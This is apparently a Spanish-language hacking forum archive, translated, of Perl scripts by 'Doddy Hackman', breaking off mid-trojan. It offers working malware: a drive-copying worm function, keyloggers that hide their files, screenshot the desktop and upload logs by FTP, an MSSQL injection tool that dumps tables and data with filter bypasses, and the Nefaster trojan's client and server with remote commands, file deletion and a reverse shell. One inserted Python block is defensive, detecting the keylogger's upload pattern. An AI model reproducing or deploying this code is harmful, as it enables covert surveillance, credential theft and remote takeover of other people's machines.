               @@@      @@@      @@@      @@@    @@@@ @@@@ @@   @@  @@  @@   @@    @@@    @@  @@




    ");
    }

    sub about {
    $about = MainWindow->new(-background=>"black");
    $about->title("Googlenator v0.3");
    $about->geometry("300x110");
    $about->resizable(0,0);
    $about->Label(-background=>"black",-foreground=>"cyan")->pack();
    $about->Label(-text=>"Contact : lepuke[at]hotmail[com]",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
    $about->Label(-text=>"Web : doddyhackman.webcindario.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
    $about->Label(-text=>"Blog : doddy-hackman.blogspot.com",-font=>"Impact",-background=>"black",-foreground=>"cyan")->pack();
    }

    sub exitx {
    exit(1);
    }

    sub savefilevul {
    open (SAVE,">>logs/vulz/".$_[0]);
    print SAVE $_[1]."\n";
    close SAVE;
    }

    sub toma {
    return $nave->get($_[0])->content;
    }

    sub dame_link {
    return $nave->find_all_links();
    }

    sub clean {
    if ($_[0] =~/\=/) {
    my @sacar= split("=",$_[0]);
    return(@sacar[0]."=");
    }
    }

    sub savefile {
    open (SAVE,">>logs/search/".$_[0]);
    print SAVE $_[1]."\n";
    close SAVE;
    }

    sub google {

    for ($pages=10;$pages<=$_[2];$pages=$pages+10) {
    $new->update();
    toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
    @links = dame_link();
    for my $l(@links) {
    if ($l->url() =~/webcache.googleusercontent.com/) {
    push(@url,$l->url());
    }
    }
    }

    for(@url) {
    if ($_ =~/cache:(.*?):(.*?)\+/) {
    push(@founds,$2);
    }
    }

    my @founds = repes(@founds);

    return @founds;
    }


    sub installer {

    unless (-d "logs/") {
    mkdir("logs/","777");
    mkdir("logs/search","777");
    mkdir("logs/vulz","777");
    }
    }

    sub repes {
    foreach my $palabra ( @_ ) {
    next if $repety{ $palabra }++;
    push @revisado,$palabra;
    }
    return @revisado;
    }

    sub loadgoogle {
    system("start ".getcwd()."/logs/search/");
    }

    sub loadfilesql {
    system("start logs/vulz/sql-logs.txt");
    }


    sub loadfilelfi {
    system("start logs/vulz/lfi-logs.txt");
    }


    sub loadfilerfi {
    system("start logs/vulz/rfi-logs.txt");
    }


    sub loadfilefsd {
    system("start logs/vulz/fsd-logs.txt");
    }

    # ¿ The End ?
#374
Scripting / [Perl] Function writeword()
10 October 2011, 16:52 PM
Hi, with this function you can launch Word and type whatever text you want; very useful if you want to make a virus.

Code (perl):
#By Doddy H

use Win32::Clipboard;
use Win32::GuiTest qw(FindWindowLike SetForegroundWindow SendKeys);

sub loadword {

system("start winword.exe");

sleep 4;

SendKeys($_[0]);

}


Usage example


loadword("Hola a todos");

#375
Scripting / [Perl] Function wormer()
10 October 2011, 16:51 PM
With this function you can copy a file onto every available drive.

Code (perl):

#ascii chr(65) = A | chr(90) = Z
#By Doddy H

use File::Copy;

sub wormear {
for my $dir(65..90) {
copy($0,chr($dir).":/");
}
}


Usage example



wormear($0);

#376
Scripting / [Perl] Function Speak()
10 October 2011, 16:51 PM
Hi everyone, with this simple function we will make our computer talk and say whatever we want, although it only speaks English well.


Code (perl):
#By Doddy H

use Win32::OLE;

sub speak {


my $habla = Win32::OLE->new("SAPI.SpVoice");

$habla->Speak($_[0],0);

}

Usage example


speak("Hi brother");

#377
Scripting / [Perl] Keycagator 0.7
9 October 2011, 17:51 PM
Hi everyone, here is the new version of this keylogger.
This version is now acceptable, with the following options:

  • Captures letters, recognizing upper and lower case
  • Captures the windows being worked in
  • Takes screenshots of the system every minute
  • Uploads the logs and screenshots via FTP
  • Hides its traces


    Code (perl):
    #!usr/bin/perl
    #KeyCagator 0.7 (C) Doddy Hackman 2011
    #

    use Win32::API;
    use Win32::GuiTest qw(GetForegroundWindow GetWindowText FindWindowLike SetForegroundWindow SendKeys);
    use Win32::Clipboard;
    use threads;
    use Net::FTP;
    use Win32::File;
    use Cwd;

    my $come = new Win32::API("user32", "GetAsyncKeyState","N", "I");
    my $tengo = 0;

    if ($^O eq 'MSWin32') {
    use Win32::Console;
    Win32::Console::Free();
    }

    hideit($0,"hide");

    subirftp("logs.txt","logs.txt");

    my $comando1 = threads->new(\&capture_windows);
    my $comando2 = threads->new(\&capture_keys);
    my $comando3 = threads->new(\&capture_screen);

    $comando1->join();
    $comando2->join();
    $comando3->join();


    sub capture_windows {

    while(1) {

    my $win1 = GetForegroundWindow();        
    my $win2 = GetForegroundWindow();

    if($win1 != $win2){
    my $nombre = GetWindowText($win1);
    chomp($nombre);
    if ($nombre ne "") {
    #print "\n\n[".$nombre."]\n\n";
    savefile("logs.txt","\n\n[".$nombre."]\n\n");
    }
    }
    }
    return 1;
    }

    sub capture_keys {

    while(1) {

    my $test1;
    my $test2;

    for my $num(0x30..0x39) { #Numbers

    if (dame($num)) {
    #print "number : ".chr($num)."\n";
    savefile("logs.txt",chr($num));
    }
    }

    if (dame(0x14)) {
    $test1 = 1;
    $tengo++;
    }

    for my $num(0x41..0x5A) { #Words

    if (dame($num)) {

    if (dame(0x20)) {
    savefile("logs.txt"," ");
    }

    if (dame(0x0d)) { # Enter (VK_RETURN)
    savefile("logs.txt","\n[enter]\n\n");
    }

    unless (verpar($tengo) eq 1) {
    #print "MAYUSCULA : ".chr($num)."\n";
    savefile("logs.txt",chr($num));
    }

    if (dame(0x10) or dame(0xA0) or dame(0xA1)) {
    #print "MAYUSCULA : ".chr($num)."\n";
    $test2 = 1;
    }

    unless ($test1 eq 1 or $test2 eq 1) {
    if ($num >= 0x41) {
    if ($num <= 0x5A) {
    if (verpar($tengo) eq 1) {
    #print "MINUSCULA : ".chr($num+32)."\n";
    savefile("logs.txt",chr($num+32));
    }
    }
    }
    }
    }
    }
    }
    return 1;
    }

    sub capture_screen {

    $numero = 0;

    while(1) {

    sleep 60;

    $numero++;

    SetForegroundWindow(1);
    SendKeys('%{PRTSCR}');

    my $a = Win32::Clipboard::GetBitmap();

    open (FOTO,">".$numero.".bmp");
    binmode(FOTO);
    print FOTO $a;
    close FOTO;

    hideit($numero.".bmp","hide");
    subirftp($numero.".bmp",$numero.".bmp");
    }
    }

    sub dame {
    return($come->Call(@_) & 1);
    }

    sub savefile {

    open (SAVE,">>".$_[0]);
    print SAVE $_[1];
    close SAVE;

    hideit($_[0],"hide");

    }

    sub hideit {
    if ($_[1] eq "show") {
    Win32::File::SetAttributes($_[0],NORMAL);
    }
    elsif ($_[1] eq "hide") {
    Win32::File::SetAttributes($_[0],HIDDEN);
    }
    else {
    print "error\n";
    }
    }

    sub subirftp {

    if ($ser = Net::FTP->new("localhost")) {
    if ($ser->login("doddy","123")) {
    print "uploaded ".getcwd()."/".$_[0]."\n";
    if ($ser->put(getcwd()."/".$_[0],$_[1])) {
    return true;
    }
    }
    $ser->close;
    }


    }

    sub verpar{
    return ($_[0] % 2 == 0) ? "1" : "2";
    }


    #Credits : to explorer for helpme with the function verpar()
    #Mail : lepuke[at]hotmail[com]
    #Blog : doddy-hackman.blogspot.com
    # ¿ The End ?
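The behaviour listed above leaves a distinctive trail on the receiving FTP server: a `logs.txt` drop, then numbered `1.bmp`, `2.bmp`, ... uploads spaced about a minute apart. The following Python is an added example of detection logic for that trail and is not part of the original post. The log lines are constructed here in a simplified "date time user direction path" form (not a real xferlog), the user names are made up, and the thresholds (`period`, `tolerance`, `min_shots`) are assumptions you would tune to your own environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of FTP transfer records: "date time user direction path".
# Simplified, made-up format for this example; 'i' = incoming to the server
# (an upload), 'o' = outgoing (a download).
SAMPLE_FTP_LOG = """\
2011-10-09 17:51:00 doddy i logs.txt
2011-10-09 17:52:01 doddy i 1.bmp
2011-10-09 17:53:02 doddy i 2.bmp
2011-10-09 17:54:03 doddy i 3.bmp
2011-10-09 17:54:10 doddy i logs.txt
2011-10-09 17:55:00 alice i report.pdf
2011-10-09 17:58:00 alice o report.pdf
"""

LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (\S+) ([io]) (\S+)$")


def parse_log(text: str):
    """Yield (timestamp, user, direction, path); lines that do not fit the format are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            yield ts, m.group(2), m.group(3), m.group(4)


def find_keylogger_exfil(text: str, period: int = 60, tolerance: int = 5, min_shots: int = 3):
    """Flag users whose uploads match the KeyCagator pattern: at least one logs.txt
    drop plus a run of N.bmp files with consecutive numbers about `period` seconds apart."""
    uploads = defaultdict(list)
    for ts, user, direction, path in parse_log(text):
        if direction == "i":
            uploads[user].append((ts, path))

    findings = []
    for user, items in uploads.items():
        shots = []
        for ts, path in items:
            m = re.fullmatch(r"(\d+)\.bmp", path)
            if m:
                shots.append((int(m.group(1)), ts))
        shots.sort()
        # count adjacent screenshots that are both numerically consecutive and ~period apart
        periodic = 0
        for (n1, t1), (n2, t2) in zip(shots, shots[1:]):
            if n2 == n1 + 1 and abs((t2 - t1).total_seconds() - period) <= tolerance:
                periodic += 1
        keylog_uploads = sum(1 for _, p in items if p == "logs.txt")
        if keylog_uploads and periodic + 1 >= min_shots:
            findings.append({"user": user, "screenshots": len(shots), "keylog_uploads": keylog_uploads})
    return findings


if __name__ == "__main__":
    for f in find_keylogger_exfil(SAMPLE_FTP_LOG):
        print(f"[!] {f['user']}: {f['screenshots']} screenshots, {f['keylog_uploads']} keylog uploads")
```

The cadence check matters more than the file names: the script above re-uploads `logs.txt` under the same name and numbers its screenshots from 1 in its working directory, so a renamed variant still produces the one-minute rhythm, while a person uploading a few `.bmp` files by hand does not.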
#378
Scripting / [Perl] KeyCagator 0.4
9 October 2011, 17:50 PM
Well, this is a keylogger in Perl that I made, with the following options:

* Captures keys, recognizing upper and lower case
* Shows the windows being worked in

Few options, but better than the previous version.

Code (perl):
#!usr/bin/perl
#KeyCagator 0.4 (C) Doddy Hackman 2010
#

use Win32::API;
use Win32::GuiTest qw(GetForegroundWindow GetWindowText);

my $come = new Win32::API("user32", "GetAsyncKeyState","N", "I");
my $tengo = 0;

if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}

while (true) {

capture_windows();
capture_keys();

}

sub capture_windows {

my $win1 = GetForegroundWindow();         
my $win2 = GetForegroundWindow();

if($win1 != $win2){
my $nombre = GetWindowText($win1);
chomp($nombre);
if ($nombre ne "") {
#print "\n\n[".$nombre."]\n\n";
savefile("logs.txt","\n\n[".$nombre."]\n\n");
}
}

}

sub capture_keys {

my $test1;
my $test2;


capture_windows();

for my $num(0x30..0x39) { #Numbers

capture_windows();

if (dame($num)) {
#print "number : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}
}

if (dame(0x14)) {
$test1 = 1;
$tengo++;
}

for my $num(0x41..0x5A) { #Words


capture_windows();

if (dame($num)) {


if (dame(0x0d)) {
savefile("logs.txt","\n\n[enter]\n\n");
}

unless (verpar($tengo) eq 1) {
#print "MAYUSCULA : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}

if (dame(0x10) or dame(0xA0) or dame(0xA1)) {
#print "MAYUSCULA : ".chr($num)."\n";
$test2 = 1;
}

unless ($test1 eq 1 or $test2 eq 1) {
if ($num >= 0x41) {
if ($num <= 0x5A) {
if (verpar($tengo) eq 1) {
#print "MINUSCULA : ".chr($num+32)."\n";
savefile("logs.txt",chr($num+32));
}
}
}
}
}
}

}

sub dame {
return($come->Call(@_) & 1);
}

sub savefile {
open (SAVE,">>".$_[0]);
print SAVE $_[1];
close SAVE;
}

sub verpar{
return ($_[0] % 2 == 0) ? "1" : "2";
}


#Credits : to explorer for helpme with the function verpar()
#Mail : lepuke[at]hotmail[com]
#Blog : doddy-hackman.blogspot.com
# ¿ The End ?
#379
Scripting / [Perl] Manager
9 October 2011, 17:50 PM
Well, here is a program that will help you list all the
processes and close whichever one you want.
This version comes with a graphical interface.

Code (perl):
#!usr/bin/perl
#Manager (C) Doddy Hackman 2010
#Module necessary
#ppm install http://trouchelle.com/ppm/Win32-Process-List.ppd

use Win32::Process::List;
use Win32::Process;
use Tk;

if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}

$new = MainWindow->new(-background=>"black");
$new->geometry("250x300+20+20");
$new->resizable(0,0);
$new->title("Manager 0.1");
$new->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Process")->pack();
my $lists = $new->Listbox(-background=>"black",-foreground=>"green")->place(-y=>"50",-x=>"60");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Close",-activebackground=>"green",-width=>"40",-command=>\&close)->place(-y=>"218");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Refresh",-width=>"40",-activebackground=>"green",-command=>\&refresh)->place(-y=>"240");
$new->Button(-background=>"black",-foreground=>"green",-text=>"About",-width=>"40",-activebackground=>"green",-command=>\&about)->place(-y=>"263");

&refresh;

MainLoop;


sub refresh {

my @pids;
my @procer;
my $limit;

$lists->delete(0.0,"end");

my $new = Win32::Process::List->new(); 
my %process = $new->GetProcesses();
my $limit = -1;
for my $pid (keys %process) {
$limit++;
push (@procer,$process{$pid});
push (@pids,$pid);
}
print "\n\n[+] ".int(@procer)."\n\n";
for my $n(0..$limit) {
print $procer[$n]."\n";
$lists->insert("end",$procer[$n]);
}


}

sub close {

$d = $lists->curselection();

for my $id (@$d) {

my $proceso = $lists->get($id);

my $pida = Win32::Process::List->new();
my @pid = $pida->GetProcessPid($proceso);

Win32::Process::KillProcess(@pid[1],$proceso);
sleep 3;
&refresh();
}
}



sub about {
$about = MainWindow->new(-background=>"black");
$about->title("About");
$about->geometry("150x100+20+20");
$about->resizable(0,0);
$about->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Coded By Doddy H")->pack();
$about->Label(-background=>"black",-foreground=>"green")->pack();
$about->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"2011")->pack();
}



# ¿ The End ?


#380
Scripting / [Perl] MSSQL T00l
9 October 2011, 17:47 PM
Well, here I bring you a tool in Perl to
find tables and columns using information_schema in MSSQL.
You can also pull the values you want from the columns.

Code (perl)
#!usr/bin/perl
#MSSQL T00l
#(C) Doddy Hackman 2011


use LWP::UserAgent;
use HTTP::Request::Common;

my $nave = LWP::UserAgent->new();
$nave->timeout(13);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

sub head {
print q(

@@    @@   @@@@  @@@@   @@@    @@     @@@@@@  @@@      @@@    @@ 
@@@  @@@  @@  @ @@  @  @@@@@   @@       @@   @@@@@    @@@@@   @@ 
@@@  @@@  @@    @@    @@   @@  @@       @@  @@   @@  @@   @@  @@ 
@@@@@@@@@@  @@@   @@@  @@   @@  @@       @@  @@   @@  @@   @@  @@ 
@@ @@@@ @@    @@    @@ @@ @@@@  @@       @@  @@   @@  @@   @@  @@ 
@@  @@  @@ @  @@ @  @@  @@@@@   @@       @@   @@@@@    @@@@@   @@ 
@@  @@  @@ @@@@  @@@@    @@@@@  @@@@     @@    @@@      @@@    @@@@
                                                                 


);
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
<stdin>;
exit(1);
}

repe();

sub repe {

system("cls");


head();


print "\n\n[Page] : ";
chomp(my $page=<stdin>);

$code = toma($page);

if ($code=~/ODBC SQL Server Driver/ig or $code=~/Microsoft OLE DB Provider/ig) {
print "\n\n[+] The page is vulnerable to MSSQL Injection\n\n";
} else {
print "\n\n[-] Not vulnerable\n\n";
#copyright();
}

menu:

print q(

##################################

1 - Dump tables
2 - Dump Columns of the a table
3 - Dump values
4 - Change target
5 - Exit

##################################


);

print "[Opcion] : ";
chomp(my $op=<stdin>);

if ($op eq 1) {
print "\n\n[*] Dumping tables...\n\n";
mssql_tables($page);
goto menu;
}
elsif ($op eq 2) {
print "\n\n[Table] : ";
chomp (my $tab = <stdin>);
print "\n\n[*] Dumping columns..\n\n";
mssql_columns($page,$tab);
goto menu;
}
elsif($op eq 3) {
print "\n\n[Table] : ";
chomp (my $tab=<stdin>);
print "\n\n[Column] : ";
chomp(my $col=<stdin>);
print "\n\n[*] Dumping values..\n\n";
mssql_data($page,$tab,$col);
goto menu;
}
elsif ($op eq 4) {
repe();
}
elsif ($op eq 5) {
copyright();
}
else {
goto menu;
}

#@tables = mssql_tables("http://www.12manage.com/profile.asp?m=drarupbarman'","Users");


sub mssql_columns {
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."column_name".$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name="."'".$_[1]."'".$pass1."and".$pass1."column_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Column found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}

sub mssql_tables {
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."table_name".$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Table found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}

sub mssql_data {
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1.$_[2].$pass1."from".$pass1.$_[1].$pass1."where".$pass1.$_[2].$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Data found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}


sub toma {
return $nave->request(GET $_[0])->content;
}


# ¿ The End ?


#381
Scripting / [Perl] Nefaster Trojan
9 October 2011, 17:47 PM
Well, this is my Nefaster trojan; in this version I fixed several things, which I will detail:

  • Show information

  • File browser

  • Change browsing directory
  • Create file
  • Delete file
  • Delete directory
  • Play music or videos by entering the path in the option
  • Stop playback

  • Open CD drive
  • Close CD drive
  • Open ports
  • Message
  • Execute commands
  • Hide taskbar
  • Restore taskbar
  • Hide desktop icons
  • Restore desktop icons
  • Manage processes, with the option to close whichever one you want
  • Reverse shell, if you want to execute commands more comfortably


    The client code is this:


    Code (perl)
    #!usr/bin/perl
    #Nefester (Client) 0.1 By Doddy H


    use IO::Socket;
    use Cwd;

    &menu;

    sub head {

    system 'cls';

    print q(


                E      F                   TT    E       
    NNNNNNNEEEEEE FFFFFF   AAA   SSSSSTTTTTTEEEEEE RRRRRR
    NN NN  E EE   FFFF   A AA  S  S T TT T  E EE   RRRRR
    NNNNN  E EE   FF F   AAAAA S     T TT   E EE   RR  R
    NNNNN EEEEE  FFFFF  AAA AA  SSS S  TT  EEEEE  RRRRR 
    NNNNN  E EEE  FFF    AAAAA S  SSS  TT   E EEE  RR R 
    NN NN  EEEE E FF    AAA AA SS  SS  TT   EEEE E RR  R
    NNN NN EEEEEEEFFFF  AAA  AAA  SSS  TTTT EEEEEEE RRR RR
                                SS                 R   R 



    );

    }

    sub menu {

    &head;

    print "[Target] : ";
    chomp(my $ip = <STDIN>);



    my $socket = new IO::Socket::INET(
    PeerAddr => $ip,
    PeerPort => 666,
    Proto => 'tcp',
    Timeout  => 5
    );

    if ($socket) {
    $socket->close;
    &menuo($ip);
    } else {
    print "\n\n[-] Target no infectado\n";
    <STDIN>;
    &menu;
    }

    }

    sub menuo {

    &head;

    print "[$_[0]] : Servidor Activado\n\n";
    print q(
    1 : Informacion
    2 : Navegador
    3 : Abrir CD
    4 : Cerrar CD
    5 : Puertos abiertos
    6 : Mensaje
    7 : CMD
    8 : Esconder barra de tareas
    9 : Devolver barra de tareas
    10 : Esconder iconos
    11 : Devolver iconos
    12 : Administrar procesos
    13 : Reverse Shell
    14 : Cambiar IP
    15 : Salir


    );
    print "[Opcion] : ";
    chomp(my $opcion = <STDIN>);


    if ($opcion eq 1) {
    print "\n\n[+] Informacion\n\n";
    $re = daryrecibir($_[0],"infor");
    if ($re=~/:(.*):(.*):(.*):(.*):(.*):/) {
    print "[Dominio] : $1\n";
    print "[Chip] : $2\n";
    print "[Version] : $3\n";
    print "[Nombre] : $4\n";
    print "[OS] : $5\n";
    <stdin>;
    }
    &menuo($_[0]);
    }
    elsif ($opcion eq 2) {

    menu1:
    print "\n\n[+] Navegacion de archivos\n\n";
    $cwd = daryrecibir($_[0],"getcwd"."\r\n");
    print "tengo $cwd\n";
    show($_[0],"/");
    &menu2;

    sub menu2 {
    print "\n\n[Opciones]\n\n";
    print "1 - Cambiar directorio\n";
    print "2 - Crear archivo\n";
    print "3 - Borrar archivo\n";
    print "4 - Borrar directorio\n";
    print "5 - Reproducir musica\n";
    print "6 - Parar reproduccion\n";
    print "7 - Volver al menu inicial\n\n";
    print "[Opcion] : ";
    chomp(my $op = <stdin>);

    if ($op eq 1) {
    print "\n\n[+] Directorio : ";
    chomp (my $dir=<stdin>);
    $ver = daryrecibir($_[0],"chdirnow K0BRA".$dir."K0BRA");
    if ($ver=~/ok/ig) {
    print "\n\n[+] Directory changed\n\n";
    }
    show($_[0],$dir);
    &menu2;
    <stdin>;
    }

    elsif ($op eq 2) {

    print "\n\n[Nombre] : ";
    chomp(my $name = <stdin>);
    print "\n\n[Contenido] : ";
    chomp(my $code = <stdin>);

    daryrecibir($_[0],"crearnow K0BRA".$name."K0BRA ACATOY".$code."ACATOY");

    print "\n\n[+] Archivo creado \n\n";
    <stdin>;
    }
    elsif ($op eq 3) {
    print "\n\n[Archivo a borrar] : ";
    chomp(my $file = <stdin>);
    $re = daryrecibir($_[0],"borrarfile K0BRA".$file."K0BRA");
    if ($re=~/ok/) {
    print "\n\n[+] Archivo Borrado\n\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    <stdin>;
    }

    elsif ($op eq 4) {
    print "\n\n[Directorio a borrar] : ";
    chomp(my $file = <stdin>);
    $re = daryrecibir($_[0],"borrardir K0BRA".$file."K0BRA");
    if ($re=~/ok/) {
    print "\n\n[+] Directorio Borrado\n\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    <stdin>;
    }

    elsif ($op eq 5) {
    print "\n\n[Archivo] : ";
    chomp(my $file = <stdin>);
    print "\n\n[+] Reproduciendo\n\n";
    daryrecibir($_[0],"playmusic K0BRA".$file."K0BRA");
    <stdin>;
    }
    elsif ($op eq 6) {
    print "\n\n[+] Reproduccion detenida\n\n";
    daryrecibir($_[0],"pararmusic");
    <stdin>;
    }
    elsif ($op eq 7) {
    &menuo($_[0]);
    }
    else {
    show($_[0],"/");
    }
    goto menu1;
    }
    }

    elsif ($opcion eq 3) {
    daryrecibir($_[0],"opencd");
    &menuo($_[0]);
    }

    elsif ($opcion eq 4) {
    daryrecibir($_[0],"closedcd");
    &menuo($_[0]);
    }

    elsif ($opcion eq 5) {
    print "\n[Puertos Abiertos]\n\n";
    $re = daryrecibir($_[0],"porters");
    while ($re=~/:(.*?):/ig) {
    if ($1 ne "") {
    print "[+] $1\n";
    }
    }
    <stdin>;
    &menuo($_[0]);
    }
    elsif ($opcion eq 6) {
    print "\n[Mensaje] : ";
    chomp (my $msg = <stdin>);
    daryrecibir($_[0],"msgbox $msg");
    <stdin>;
    &menuo($_[0]);
    }
    elsif ($opcion eq 7) {

    menu:

    my $cmd,$re;

    print "\n\n>";

    chomp(my $cmd= <stdin>);

    if ($cmd=~/exit/ig) {
    &menuo($_[0]);
    }

    $re = daryrecibir($_[0],"comando :$cmd:");
    print "\n".$re;
    goto menu;
    &menuo($_[0]);
    }
    elsif ($opcion eq 8) {
    daryrecibir($_[0],"iniciochau");
    &menuo($_[0]);
    }
    elsif ($opcion eq 9) {
    daryrecibir($_[0],"iniciovuelve");
    &menuo($_[0]);
    }
    elsif ($opcion eq 10) {
    daryrecibir($_[0],"iconochau");
    &menuo($_[0]);
    }
    elsif ($opcion eq 11) {
    daryrecibir($_[0],"iconovuelve");
    &menuo($_[0]);
    }

    elsif ($opcion eq 12) {

    &reload($_[0]);

    sub reload {

    my @pro;
    my @pids;

    my $sockex = new IO::Socket::INET(
    PeerAddr => $_[0],
    PeerPort => 666,
    Proto => 'tcp',
    Timeout  => 5
    );

    print $sockex "mostrarpro"."\r\n";
    $sockex->read($re,5000);
    $sockex->close;

    chomp $re;

    print "\n\n[+] Procesos encontrados\n\n";

    while ($re=~/PROXEC(.*?)PROXEC/ig) {
    if ($1 ne "") {
    push(@pro,$1);
    }
    }

    while ($re=~/PIDX(.*?)PIDX/ig) {
    if ($1 ne "") {
    push(@pids,$1);
    }
    }

    $cantidad = int(@pro);

    for my $num(1..$cantidad) {
    if ($pro[$num] ne "") {
    print "\n[+] Proceso : ".$pro[$num]."\n";
    print "[+] PIDS : ".$pids[$num]."\n";
    }
    }

    print q(

    [Opciones]


    1 - Refrescar lista
    2 - Cerrar procesos
    3 - Volver al menu

    );

    print "\n[Opcion] :  ";
    chomp(my $opc = <stdin>);

    if ($opc=~/1/ig) {
    &reload($_[0]);
    }
    elsif($opc=~/2/ig) {
    print "\n[+] Write the name of the process : ";
    chomp(my $numb = <stdin>);
    print "\n[+] Write the PID of the process : ";
    chomp(my $pid = <stdin>);
    $re = daryrecibir($_[0],"chauproce K0BRA".$pid."K0BRA".$numb."K0BRA");
    if ($re=~/ok/ig) {
    print "\n\n[+] Proceso cerrado\n\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    <stdin>;
    &reload($_[0]);
    }
    elsif($opc=~/3/ig) {
    &menuo($_[0]);
    }
    else {
    &reload;
    }
    }
    }

    elsif ($opcion eq 13) {
    print "\n\n[IP] : ";
    chomp(my $ip = <stdin>);
    print "\n\n[Port] : ";
    chomp(my $port = <stdin>);
    print "\n\n[+] Connected !!!\n\n";
    $re = daryrecibir($_[0],"backshell :$ip:$port:");
    }
    elsif ($opcion eq 14) {
    &menu;
    }
    elsif ($opcion eq 15) {
    exit 1;
    }
    else {
    &menuo;
    }
    }

    sub daryrecibir {

    my $sockex = new IO::Socket::INET(
    PeerAddr => $_[0],
    PeerPort => 666,
    Proto => 'tcp',
    Timeout  => 5
    );

    print $sockex $_[1]."\r\n";
    $sockex->read($re,5000);
    $sockex->close;
    return $re."\r";
    }

    sub show {

    my $re = daryrecibir($_[0],"getcwd"."\r\n");
    print "\n\n[+] Directorio Actual : $re\n\n";
    $re1 = daryrecibir($_[0],"dirnow ACATOY".$re."ACATOY"."\r\n");
    print "\n\n[Directorios]\n\n";

    while ($re1=~/DIREX(.*?)DIREX/ig) {
    if ($1 ne "") {
    print "[+] $1\n";
    }
    }

    print "\n\n[Archivos]\n\n";

    while ($re1=~/FILEX(.*?)FILEX/ig) {
    if ($1 ne "") {
    print "[+] $1\n";
    }
    }

    }

    #
    # ¿ The End ?
    #


    And the server:

    Code (perl)

    #!/usr/bin/perl
    #Nefester (Server) 0.1 By Doddy H
    #Compile with perl2exe to get rid of the console window

    use IO::Socket;
    use Socket;
    use Win32;
    use Cwd;
    use Win32::MediaPlayer;
    use Win32::Process::List;
    use Win32::Process;
    use Win32::API;

    use constant SW_HIDE => 0;
    use constant SW_SHOWNORMAL => 1;

    my $a = new Win32::API('user32', 'FindWindow', 'PP', 'N');
    my $b = new Win32::API('user32', 'ShowWindow', 'NN', 'N');

    $test = new Win32::MediaPlayer;

    my $sock = IO::Socket::INET->new(LocalPort => 666,
    Listen => 10,
    Proto => 'tcp',
    Reuse => 1);

    print "online\n";

    while (my $con = $sock->accept){
    $resultado = <$con>;
    print "boludo mando : $resultado\n";

    if ($resultado=~/msgbox (.*)/ig) {
    Win32::MsgBox($1,0,"Mensaje de Dios")
    }

    if ($resultado=~/backshell :(.*):(.*):/ig) {

    my ($ip,$port) = ($1,$2);

    print "conectando $ip con $port\n";

    $ip =~s/(\s)+$//;
    $port =~s/(\s)+$//;

    conectar($ip,$port);
    tipo();

    sub conectar {
    socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
    connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
    open (STDIN,">&REVERSE");
    open (STDOUT,">&REVERSE");
    open (STDERR,">&REVERSE");
    }

    sub tipo {
    print "\n[*] Reverse Shell Starting...\n\n";
    if ($^O =~/Win32/ig) {
    infowin();
    system("cmd.exe");
    } else {
    infolinux();
    #root(); 
    system("export TERM=xterm;exec sh -i");
    }
    }

    sub infowin {
    print "[+] Domain Name : ".Win32::DomainName()."\n";
    print "[+] OS Version : ".Win32::GetOSName()."\n";
    print "[+] Username : ".Win32::LoginName()."\n\n\n";
    }

    sub infolinux {
    print "[+] System information\n\n";
    system("uname -a");
    print "\n\n";
    }


    }

    if ($resultado =~/opencd/ig) {

    use Win32::API;

    my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N");
    my $rta = ' ' x 127; 
    $ventana->Call('set CDAudio door open', $rta, 127, 0);
    print $con "ok"."\r\n";
    }

    if ($resultado=~/chauproce K0BRA(.*)K0BRA(.*)K0BRA/ig) {

    my ($pid,$numb) = ($1,$2);

    $pid=~s/(\s)+$//;
    $numb=~s/(\s)+$//;

    if (Win32::Process::KillProcess($pid,$numb)) {
    print $con "ok\r\n";
    }
    }

    if ($resultado =~/closedcd/ig) {

    use Win32::API;

